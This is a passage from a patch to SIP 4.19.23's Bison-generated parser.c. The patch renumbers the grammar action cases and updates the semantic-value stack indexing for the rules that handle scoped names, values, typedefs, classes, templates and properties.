"sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 352: /* scopednamehead: scopednamehead TK_SCOPE scopepart */ ++#line 2883 "parser.y" ++ { + if (currentSpec->genc) + yyerror("Scoped names are not allowed in a C module"); + +- appendScopedName(&(yyvsp[(1) - (3)].scpvalp), (yyvsp[(3) - (3)].scpvalp)); ++ appendScopedName(&(yyvsp[-2].scpvalp), (yyvsp[0].scpvalp)); + } ++#line 5704 "../parser.c" + break; + +- case 352: +-#line 2865 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.scpvalp) = text2scopePart((yyvsp[(1) - (1)].text)); ++ case 353: /* scopepart: TK_NAME_VALUE */ ++#line 2891 "parser.y" ++ { ++ (yyval.scpvalp) = text2scopePart((yyvsp[0].text)); + } ++#line 5712 "../parser.c" + break; + +- case 353: +-#line 2870 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 354: /* bool_value: TK_TRUE_VALUE */ ++#line 2896 "parser.y" ++ { + (yyval.boolean) = TRUE; + } ++#line 5720 "../parser.c" + break; + +- case 354: +-#line 2873 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 355: /* bool_value: TK_FALSE_VALUE */ ++#line 2899 "parser.y" ++ { + (yyval.boolean) = FALSE; + } ++#line 5728 "../parser.c" + break; + +- case 355: +-#line 2878 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 356: /* simplevalue: scopedname */ ++#line 2904 "parser.y" ++ { + /* + * We let the C++ compiler decide if the value is a valid one - no + * point in building a full C++ parser here. + */ + + (yyval.value).vtype = scoped_value; +- (yyval.value).u.vscp = (yyvsp[(1) - (1)].scpvalp); ++ (yyval.value).u.vscp = (yyvsp[0].scpvalp); + } ++#line 5742 "../parser.c" + break; + +- case 356: +-#line 2887 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 357: /* simplevalue: basetype '(' exprlist ')' */ ++#line 2913 "parser.y" ++ { + fcallDef *fcd; + + fcd = sipMalloc(sizeof (fcallDef)); +- *fcd = (yyvsp[(3) - (4)].fcall); +- fcd -> type = (yyvsp[(1) - (4)].memArg); ++ *fcd = (yyvsp[-1].fcall); ++ fcd -> type = (yyvsp[-3].memArg); + + (yyval.value).vtype = fcall_value; + (yyval.value).u.fcd = fcd; + } ++#line 5757 "../parser.c" + break; + +- case 357: +-#line 2897 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 358: /* simplevalue: '{' '}' */ ++#line 2923 "parser.y" ++ { + (yyval.value).vtype = empty_value; + } ++#line 5765 "../parser.c" + break; + +- case 358: +-#line 2900 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 359: /* simplevalue: TK_REAL_VALUE */ ++#line 2926 "parser.y" ++ { + (yyval.value).vtype = real_value; +- (yyval.value).u.vreal = (yyvsp[(1) - (1)].real); ++ (yyval.value).u.vreal = (yyvsp[0].real); + } ++#line 5774 "../parser.c" + break; + +- case 359: +-#line 2904 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 360: /* simplevalue: TK_NUMBER_VALUE */ ++#line 2930 "parser.y" ++ { + (yyval.value).vtype = numeric_value; +- (yyval.value).u.vnum = (yyvsp[(1) - (1)].number); ++ (yyval.value).u.vnum = (yyvsp[0].number); + } ++#line 5783 "../parser.c" + break; + +- case 360: +-#line 2908 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 361: /* simplevalue: bool_value */ ++#line 2934 "parser.y" ++ { + (yyval.value).vtype = numeric_value; +- (yyval.value).u.vnum = (yyvsp[(1) - (1)].boolean); ++ (yyval.value).u.vnum = (yyvsp[0].boolean); + } ++#line 5792 "../parser.c" + break; + +- case 361: +-#line 2912 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 362: /* simplevalue: TK_NULL_VALUE */ ++#line 2938 "parser.y" ++ { + (yyval.value).vtype = numeric_value; + (yyval.value).u.vnum = 0; + } ++#line 5801 "../parser.c" + break; + +- case 362: +-#line 2916 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 363: /* simplevalue: TK_STRING_VALUE */ ++#line 2942 "parser.y" ++ { + (yyval.value).vtype = string_value; +- (yyval.value).u.vstr = (yyvsp[(1) - (1)].text); ++ (yyval.value).u.vstr = (yyvsp[0].text); + } ++#line 5810 "../parser.c" + break; + +- case 363: +-#line 2920 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 364: /* simplevalue: TK_QCHAR_VALUE */ ++#line 2946 "parser.y" ++ { + (yyval.value).vtype = qchar_value; +- (yyval.value).u.vqchar = (yyvsp[(1) - (1)].qchar); ++ (yyval.value).u.vqchar = (yyvsp[0].qchar); + } ++#line 5819 "../parser.c" + break; + +- case 364: +-#line 2926 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 365: /* exprlist: %empty */ ++#line 2952 "parser.y" ++ { + /* No values. */ + + (yyval.fcall).nrArgs = 0; + } ++#line 5829 "../parser.c" + break; + +- case 365: +-#line 2931 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 366: /* exprlist: expr */ ++#line 2957 "parser.y" ++ { + /* The single or first expression. */ + +- (yyval.fcall).args[0] = (yyvsp[(1) - (1)].valp); ++ (yyval.fcall).args[0] = (yyvsp[0].valp); + (yyval.fcall).nrArgs = 1; + } ++#line 5840 "../parser.c" + break; + +- case 366: +-#line 2937 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 367: /* exprlist: exprlist ',' expr */ ++#line 2963 "parser.y" ++ { + /* Check that it wasn't ...(,expression...). */ + + if ((yyval.fcall).nrArgs == 0) +@@ -5971,19 +5849,20 @@ yyreduce: + + /* Check there is room. */ + +- if ((yyvsp[(1) - (3)].fcall).nrArgs == MAX_NR_ARGS) ++ if ((yyvsp[-2].fcall).nrArgs == MAX_NR_ARGS) + yyerror("Internal error - increase the value of MAX_NR_ARGS"); + +- (yyval.fcall) = (yyvsp[(1) - (3)].fcall); ++ (yyval.fcall) = (yyvsp[-2].fcall); + +- (yyval.fcall).args[(yyval.fcall).nrArgs] = (yyvsp[(3) - (3)].valp); ++ (yyval.fcall).args[(yyval.fcall).nrArgs] = (yyvsp[0].valp); + (yyval.fcall).nrArgs++; + } ++#line 5861 "../parser.c" + break; + +- case 367: +-#line 2955 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 368: /* typedef: TK_TYPEDEF cpptype TK_NAME_VALUE optflags ';' optdocstring */ ++#line 2981 "parser.y" ++ { + if (notSkipping()) + { + const char *annos[] = { +@@ -5999,17 +5878,18 @@ yyreduce: + NULL + }; + +- checkAnnos(&(yyvsp[(4) - (6)].optflags), annos); ++ checkAnnos(&(yyvsp[-2].optflags), annos); + +- applyTypeFlags(currentModule, &(yyvsp[(2) - (6)].memArg), &(yyvsp[(4) - (6)].optflags)); +- newTypedef(currentSpec, currentModule, (yyvsp[(3) - (6)].text), &(yyvsp[(2) - (6)].memArg), &(yyvsp[(4) - (6)].optflags), (yyvsp[(6) - (6)].docstr)); ++ applyTypeFlags(currentModule, &(yyvsp[-4].memArg), &(yyvsp[-2].optflags)); ++ newTypedef(currentSpec, currentModule, (yyvsp[-3].text), &(yyvsp[-4].memArg), &(yyvsp[-2].optflags), (yyvsp[0].docstr)); + } + } ++#line 5888 "../parser.c" + break; + +- case 368: +-#line 2977 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 369: /* typedef: TK_TYPEDEF cpptype '(' '*' TK_NAME_VALUE ')' '(' cpptypelist ')' optflags ';' optdocstring */ ++#line 3003 "parser.y" ++ { + if (notSkipping()) + { + const char *annos[] = { +@@ -6027,41 +5907,43 @@ yyreduce: + signatureDef *sig; + argDef ftype; + +- checkAnnos(&(yyvsp[(10) - (12)].optflags), annos); ++ checkAnnos(&(yyvsp[-2].optflags), annos); + +- applyTypeFlags(currentModule, &(yyvsp[(2) - (12)].memArg), &(yyvsp[(10) - (12)].optflags)); ++ applyTypeFlags(currentModule, &(yyvsp[-10].memArg), &(yyvsp[-2].optflags)); + + memset(&ftype, 0, sizeof (argDef)); + + /* Create the full signature on the heap. */ + sig = sipMalloc(sizeof (signatureDef)); +- *sig = (yyvsp[(8) - (12)].signature); +- sig->result = (yyvsp[(2) - (12)].memArg); ++ *sig = (yyvsp[-4].signature); ++ sig->result = (yyvsp[-10].memArg); + + /* Create the full type. */ + ftype.atype = function_type; + ftype.nrderefs = 1; + ftype.u.sa = sig; + +- newTypedef(currentSpec, currentModule, (yyvsp[(5) - (12)].text), &ftype, &(yyvsp[(10) - (12)].optflags), (yyvsp[(12) - (12)].docstr)); ++ newTypedef(currentSpec, currentModule, (yyvsp[-7].text), &ftype, &(yyvsp[-2].optflags), (yyvsp[0].docstr)); + } + } ++#line 5930 "../parser.c" + break; + +- case 369: +-#line 3016 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- if (currentSpec -> genc && (yyvsp[(2) - (2)].scpvalp)->next != NULL) ++ case 370: /* $@10: %empty */ ++#line 3042 "parser.y" ++ { ++ if (currentSpec -> genc && (yyvsp[0].scpvalp)->next != NULL) + yyerror("Namespaces not allowed in a C module"); + + if (notSkipping()) + currentSupers = NULL; + } ++#line 5942 "../parser.c" + break; + +- case 370: +-#line 3022 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 371: /* $@11: %empty */ ++#line 3048 "parser.y" ++ { + if (notSkipping()) + { + const char *annos[] = { +@@ -6091,33 +5973,36 @@ yyreduce: + NULL + }; + +- checkAnnos(&(yyvsp[(5) - (5)].optflags), annos); ++ checkAnnos(&(yyvsp[0].optflags), annos); + + if (currentSpec->genc && currentSupers != NULL) + yyerror("Super-classes not allowed in a C module struct"); + +- defineClass((yyvsp[(2) - (5)].scpvalp), currentSupers, &(yyvsp[(5) - (5)].optflags)); ++ defineClass((yyvsp[-3].scpvalp), currentSupers, &(yyvsp[0].optflags)); + sectionFlags = SECT_IS_PUBLIC; + } + } ++#line 5986 "../parser.c" + break; + +- case 371: +-#line 3060 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 372: /* struct: TK_STRUCT scopedname $@10 superclasses optflags $@11 optclassbody ';' */ ++#line 3086 "parser.y" ++ { + if (notSkipping()) +- completeClass((yyvsp[(2) - (8)].scpvalp), &(yyvsp[(5) - (8)].optflags), (yyvsp[(7) - (8)].boolean)); ++ completeClass((yyvsp[-6].scpvalp), &(yyvsp[-3].optflags), (yyvsp[-1].boolean)); + } ++#line 5995 "../parser.c" + break; + +- case 372: +-#line 3066 "sip-4.19.23/sipgen/metasrc/parser.y" +- {currentIsTemplate = TRUE;} ++ case 373: /* $@12: %empty */ ++#line 3092 "parser.y" ++ {currentIsTemplate = TRUE;} ++#line 6001 "../parser.c" + break; + +- case 373: +-#line 3066 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 374: /* classtmpl: template $@12 class */ ++#line 3092 "parser.y" ++ { + if (currentSpec->genc) + yyerror("Class templates not allowed in a C module"); + +@@ -6128,12 +6013,12 @@ yyreduce: + /* + * Make sure there is room for the extra class name argument. + */ +- if ((yyvsp[(1) - (3)].signature).nrArgs == MAX_NR_ARGS) ++ if ((yyvsp[-2].signature).nrArgs == MAX_NR_ARGS) + yyerror("Internal error - increase the value of MAX_NR_ARGS"); + + tcd = sipMalloc(sizeof (classTmplDef)); +- tcd->sig = (yyvsp[(1) - (3)].signature); +- tcd->cd = (yyvsp[(3) - (3)].klass); ++ tcd->sig = (yyvsp[-2].signature); ++ tcd->cd = (yyvsp[0].klass); + tcd->next = currentSpec->classtemplates; + + currentSpec->classtemplates = tcd; +@@ -6141,29 +6026,32 @@ yyreduce: + + currentIsTemplate = FALSE; + } ++#line 6030 "../parser.c" + break; + +- case 374: +-#line 3092 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.signature) = (yyvsp[(3) - (4)].signature); ++ case 375: /* template: TK_TEMPLATE '<' cpptypelist '>' */ ++#line 3118 "parser.y" ++ { ++ (yyval.signature) = (yyvsp[-1].signature); + } ++#line 6038 "../parser.c" + break; + +- case 375: +-#line 3097 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 376: /* $@13: %empty */ ++#line 3123 "parser.y" ++ { + if (currentSpec->genc) + yyerror("Class definition not allowed in a C module"); + + if (notSkipping()) + currentSupers = NULL; + } ++#line 6050 "../parser.c" + break; + +- case 376: +-#line 3103 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 377: /* $@14: %empty */ ++#line 3129 "parser.y" ++ { + if (notSkipping()) + { + const char *annos[] = { +@@ -6192,30 +6080,32 @@ yyreduce: + NULL + }; + +- checkAnnos(&(yyvsp[(5) - (5)].optflags), annos); ++ checkAnnos(&(yyvsp[0].optflags), annos); + +- defineClass((yyvsp[(2) - (5)].scpvalp), currentSupers, &(yyvsp[(5) - (5)].optflags)); ++ defineClass((yyvsp[-3].scpvalp), currentSupers, &(yyvsp[0].optflags)); + sectionFlags = SECT_IS_PRIVATE; + } + } ++#line 6090 "../parser.c" + break; + +- case 377: +-#line 3137 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 378: /* class: TK_CLASS scopedname $@13 superclasses optflags $@14 optclassbody ';' */ ++#line 3163 "parser.y" ++ { + if (notSkipping()) +- (yyval.klass) = completeClass((yyvsp[(2) - (8)].scpvalp), &(yyvsp[(5) - (8)].optflags), (yyvsp[(7) - (8)].boolean)); ++ (yyval.klass) = completeClass((yyvsp[-6].scpvalp), &(yyvsp[-3].optflags), (yyvsp[-1].boolean)); + } ++#line 6099 "../parser.c" + break; + +- case 382: +-#line 3151 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- if (notSkipping() && (yyvsp[(1) - (2)].token) == TK_PUBLIC) ++ case 383: /* superclass: class_access scopedname */ ++#line 3177 "parser.y" ++ { ++ if (notSkipping() && (yyvsp[-1].token) == TK_PUBLIC) + { + argDef ad; + classDef *super; +- scopedNameDef *snd = (yyvsp[(2) - (2)].scpvalp); ++ scopedNameDef *snd = (yyvsp[0].scpvalp); + + /* + * This is a hack to allow typedef'ed classes to be used before +@@ -6260,53 +6150,60 @@ yyreduce: + appendToClassList(¤tSupers, super); + } + } ++#line 6154 "../parser.c" + break; + +- case 383: +-#line 3203 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 384: /* class_access: %empty */ ++#line 3229 "parser.y" ++ { + (yyval.token) = TK_PUBLIC; + } ++#line 6162 "../parser.c" + break; + +- case 384: +-#line 3206 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 385: /* class_access: TK_PUBLIC */ ++#line 3232 "parser.y" ++ { + (yyval.token) = TK_PUBLIC; + } ++#line 6170 "../parser.c" + break; + +- case 385: +-#line 3209 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 386: /* class_access: TK_PROTECTED */ ++#line 3235 "parser.y" ++ { + (yyval.token) = TK_PROTECTED; + } ++#line 6178 "../parser.c" + break; + +- case 386: +-#line 3212 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 387: /* class_access: TK_PRIVATE */ ++#line 3238 "parser.y" ++ { + (yyval.token) = TK_PRIVATE; + } ++#line 6186 "../parser.c" + break; + +- case 387: +-#line 3217 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 388: /* optclassbody: %empty */ ++#line 3243 "parser.y" ++ { + (yyval.boolean) = FALSE; + } ++#line 6194 "../parser.c" + break; + +- case 388: +-#line 3220 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 389: /* optclassbody: '{' classbody '}' */ ++#line 3246 "parser.y" ++ { + (yyval.boolean) = TRUE; + } ++#line 6202 "../parser.c" + break; + +- case 402: +-#line 3240 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 403: /* classline: docstring */ ++#line 3266 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6314,30 +6211,33 @@ yyreduce: + if (scope->docstring != NULL) + yyerror("%Docstring already given for class"); + +- scope->docstring = (yyvsp[(1) - (1)].docstr); ++ scope->docstring = (yyvsp[0].docstr); + } + } ++#line 6218 "../parser.c" + break; + +- case 403: +-#line 3251 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 404: /* classline: typecode */ ++#line 3277 "parser.y" ++ { + if (notSkipping()) +- appendCodeBlock(¤tScope()->cppcode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(¤tScope()->cppcode, (yyvsp[0].codeb)); + } ++#line 6227 "../parser.c" + break; + +- case 404: +-#line 3255 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 405: /* classline: typehdrcode */ ++#line 3281 "parser.y" ++ { + if (notSkipping()) +- appendCodeBlock(¤tScope()->iff->hdrcode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(¤tScope()->iff->hdrcode, (yyvsp[0].codeb)); + } ++#line 6236 "../parser.c" + break; + +- case 405: +-#line 3259 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 406: /* classline: travcode */ ++#line 3285 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6345,14 +6245,15 @@ yyreduce: + if (scope->travcode != NULL) + yyerror("%GCTraverseCode already given for class"); + +- appendCodeBlock(&scope->travcode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(&scope->travcode, (yyvsp[0].codeb)); + } + } ++#line 6252 "../parser.c" + break; + +- case 406: +-#line 3270 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 407: /* classline: clearcode */ ++#line 3296 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6360,14 +6261,15 @@ yyreduce: + if (scope->clearcode != NULL) + yyerror("%GCClearCode already given for class"); + +- appendCodeBlock(&scope->clearcode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(&scope->clearcode, (yyvsp[0].codeb)); + } + } ++#line 6268 "../parser.c" + break; + +- case 407: +-#line 3281 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 408: /* classline: getbufcode */ ++#line 3307 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6375,14 +6277,15 @@ yyreduce: + if (scope->getbufcode != NULL) + yyerror("%BIGetBufferCode already given for class"); + +- appendCodeBlock(&scope->getbufcode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(&scope->getbufcode, (yyvsp[0].codeb)); + } + } ++#line 6284 "../parser.c" + break; + +- case 408: +-#line 3292 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 409: /* classline: releasebufcode */ ++#line 3318 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6390,14 +6293,15 @@ yyreduce: + if (scope->releasebufcode != NULL) + yyerror("%BIReleaseBufferCode already given for class"); + +- appendCodeBlock(&scope->releasebufcode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(&scope->releasebufcode, (yyvsp[0].codeb)); + } + } ++#line 6300 "../parser.c" + break; + +- case 409: +-#line 3303 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 410: /* classline: readbufcode */ ++#line 3329 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6405,14 +6309,15 @@ yyreduce: + if (scope->readbufcode != NULL) + yyerror("%BIGetReadBufferCode already given for class"); + +- appendCodeBlock(&scope->readbufcode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(&scope->readbufcode, (yyvsp[0].codeb)); + } + } ++#line 6316 "../parser.c" + break; + +- case 410: +-#line 3314 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 411: /* classline: writebufcode */ ++#line 3340 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6420,14 +6325,15 @@ yyreduce: + if (scope->writebufcode != NULL) + yyerror("%BIGetWriteBufferCode already given for class"); + +- appendCodeBlock(&scope->writebufcode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(&scope->writebufcode, (yyvsp[0].codeb)); + } + } ++#line 6332 "../parser.c" + break; + +- case 411: +-#line 3325 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 412: /* classline: segcountcode */ ++#line 3351 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6435,14 +6341,15 @@ yyreduce: + if (scope->segcountcode != NULL) + yyerror("%BIGetSegCountCode already given for class"); + +- appendCodeBlock(&scope->segcountcode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(&scope->segcountcode, (yyvsp[0].codeb)); + } + } ++#line 6348 "../parser.c" + break; + +- case 412: +-#line 3336 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 413: /* classline: charbufcode */ ++#line 3362 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6450,14 +6357,15 @@ yyreduce: + if (scope->charbufcode != NULL) + yyerror("%BIGetCharBufferCode already given for class"); + +- appendCodeBlock(&scope->charbufcode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(&scope->charbufcode, (yyvsp[0].codeb)); + } + } ++#line 6364 "../parser.c" + break; + +- case 413: +-#line 3347 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 414: /* classline: instancecode */ ++#line 3373 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6465,14 +6373,15 @@ yyreduce: + if (scope->instancecode != NULL) + yyerror("%InstanceCode already given for class"); + +- appendCodeBlock(&scope->instancecode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(&scope->instancecode, (yyvsp[0].codeb)); + } + } ++#line 6380 "../parser.c" + break; + +- case 414: +-#line 3358 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 415: /* classline: picklecode */ ++#line 3384 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6480,14 +6389,15 @@ yyreduce: + if (scope->picklecode != NULL) + yyerror("%PickleCode already given for class"); + +- appendCodeBlock(&scope->picklecode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(&scope->picklecode, (yyvsp[0].codeb)); + } + } ++#line 6396 "../parser.c" + break; + +- case 415: +-#line 3369 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 416: /* classline: finalcode */ ++#line 3395 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6495,14 +6405,15 @@ yyreduce: + if (scope->finalcode != NULL) + yyerror("%FinalisationCode already given for class"); + +- appendCodeBlock(&scope->finalcode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(&scope->finalcode, (yyvsp[0].codeb)); + } + } ++#line 6412 "../parser.c" + break; + +- case 416: +-#line 3380 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 417: /* classline: classtypehintcode */ ++#line 3406 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6510,14 +6421,15 @@ yyreduce: + if (scope->typehintcode != NULL) + yyerror("%TypeHintCode already given for class"); + +- appendCodeBlock(&scope->typehintcode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(&scope->typehintcode, (yyvsp[0].codeb)); + } + } ++#line 6428 "../parser.c" + break; + +- case 420: +-#line 3394 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 421: /* classline: TK_TOSUBCLASS codeblock */ ++#line 3420 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6525,14 +6437,15 @@ yyreduce: + if (scope->convtosubcode != NULL) + yyerror("Class has more than one %ConvertToSubClassCode directive"); + +- appendCodeBlock(&scope->convtosubcode, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(&scope->convtosubcode, (yyvsp[0].codeb)); + } + } ++#line 6444 "../parser.c" + break; + +- case 421: +-#line 3405 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 422: /* classline: TK_TOTYPE codeblock */ ++#line 3431 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6540,14 +6453,15 @@ yyreduce: + if (scope->convtocode != NULL) + yyerror("Class has more than one %ConvertToTypeCode directive"); + +- appendCodeBlock(&scope->convtocode, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(&scope->convtocode, (yyvsp[0].codeb)); + } + } ++#line 6460 "../parser.c" + break; + +- case 422: +-#line 3416 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 423: /* classline: TK_FROMTYPE codeblock */ ++#line 3442 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6555,172 +6469,188 @@ yyreduce: + if (scope->convfromcode != NULL) + yyerror("Class has more than one %ConvertFromTypeCode directive"); + +- appendCodeBlock(&scope->convfromcode, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(&scope->convfromcode, (yyvsp[0].codeb)); + } + } ++#line 6476 "../parser.c" + break; + +- case 423: +-#line 3427 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 424: /* classline: TK_PUBLIC optslot ':' */ ++#line 3453 "parser.y" ++ { + if (currentSpec -> genc) + yyerror("public section not allowed in a C module"); + + if (notSkipping()) +- sectionFlags = SECT_IS_PUBLIC | (yyvsp[(2) - (3)].number); ++ sectionFlags = SECT_IS_PUBLIC | (yyvsp[-1].number); + } ++#line 6488 "../parser.c" + break; + +- case 424: +-#line 3434 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 425: /* classline: TK_PROTECTED optslot ':' */ ++#line 3460 "parser.y" ++ { + if (currentSpec -> genc) + yyerror("protected section not allowed in a C module"); + + if (notSkipping()) +- sectionFlags = SECT_IS_PROT | (yyvsp[(2) - (3)].number); ++ sectionFlags = SECT_IS_PROT | (yyvsp[-1].number); + } ++#line 6500 "../parser.c" + break; + +- case 425: +-#line 3441 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 426: /* classline: TK_PRIVATE optslot ':' */ ++#line 3467 "parser.y" ++ { + if (currentSpec -> genc) + yyerror("private section not allowed in a C module"); + + if (notSkipping()) +- sectionFlags = SECT_IS_PRIVATE | (yyvsp[(2) - (3)].number); ++ sectionFlags = SECT_IS_PRIVATE | (yyvsp[-1].number); + } ++#line 6512 "../parser.c" + break; + +- case 426: +-#line 3448 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 427: /* classline: TK_SIGNALS ':' */ ++#line 3474 "parser.y" ++ { + if (currentSpec -> genc) + yyerror("signals section not allowed in a C module"); + + if (notSkipping()) + sectionFlags = SECT_IS_SIGNAL; + } ++#line 6524 "../parser.c" + break; + +- case 427: +-#line 3457 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- if ((yyvsp[(2) - (3)].property).name == NULL) ++ case 428: /* property: TK_PROPERTY property_args property_body */ ++#line 3483 "parser.y" ++ { ++ if ((yyvsp[-1].property).name == NULL) + yyerror("A %Property directive must have a 'name' argument"); + +- if ((yyvsp[(2) - (3)].property).get == NULL) ++ if ((yyvsp[-1].property).get == NULL) + yyerror("A %Property directive must have a 'get' argument"); + + if (notSkipping()) + addProperty(currentSpec, currentModule, currentScope(), +- (yyvsp[(2) - (3)].property).name, (yyvsp[(2) - (3)].property).get, (yyvsp[(2) - (3)].property).set, (yyvsp[(3) - (3)].property).docstring); ++ (yyvsp[-1].property).name, (yyvsp[-1].property).get, (yyvsp[-1].property).set, (yyvsp[0].property).docstring); + } ++#line 6540 "../parser.c" + break; + +- case 428: +-#line 3470 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.property) = (yyvsp[(2) - (3)].property); ++ case 429: /* property_args: '(' property_arg_list ')' */ ++#line 3496 "parser.y" ++ { ++ (yyval.property) = (yyvsp[-1].property); + } ++#line 6548 "../parser.c" + break; + +- case 430: +-#line 3476 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.property) = (yyvsp[(1) - (3)].property); ++ case 431: /* property_arg_list: property_arg_list ',' property_arg */ ++#line 3502 "parser.y" ++ { ++ (yyval.property) = (yyvsp[-2].property); + +- switch ((yyvsp[(3) - (3)].property).token) ++ switch ((yyvsp[0].property).token) + { +- case TK_GET: (yyval.property).get = (yyvsp[(3) - (3)].property).get; break; +- case TK_NAME: (yyval.property).name = (yyvsp[(3) - (3)].property).name; break; +- case TK_SET: (yyval.property).set = (yyvsp[(3) - (3)].property).set; break; ++ case TK_GET: (yyval.property).get = (yyvsp[0].property).get; break; ++ case TK_NAME: (yyval.property).name = (yyvsp[0].property).name; break; ++ case TK_SET: (yyval.property).set = (yyvsp[0].property).set; break; + } + } ++#line 6563 "../parser.c" + break; + +- case 431: +-#line 3488 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 432: /* property_arg: TK_GET '=' TK_NAME_VALUE */ ++#line 3514 "parser.y" ++ { + (yyval.property).token = TK_GET; + +- (yyval.property).get = (yyvsp[(3) - (3)].text); ++ (yyval.property).get = (yyvsp[0].text); + (yyval.property).name = NULL; + (yyval.property).set = NULL; + } ++#line 6575 "../parser.c" + break; + +- case 432: +-#line 3495 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 433: /* property_arg: TK_NAME '=' name_or_string */ ++#line 3521 "parser.y" ++ { + (yyval.property).token = TK_NAME; + + (yyval.property).get = NULL; +- (yyval.property).name = (yyvsp[(3) - (3)].text); ++ (yyval.property).name = (yyvsp[0].text); + (yyval.property).set = NULL; + } ++#line 6587 "../parser.c" + break; + +- case 433: +-#line 3502 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 434: /* property_arg: TK_SET '=' TK_NAME_VALUE */ ++#line 3528 "parser.y" ++ { + (yyval.property).token = TK_SET; + + (yyval.property).get = NULL; + 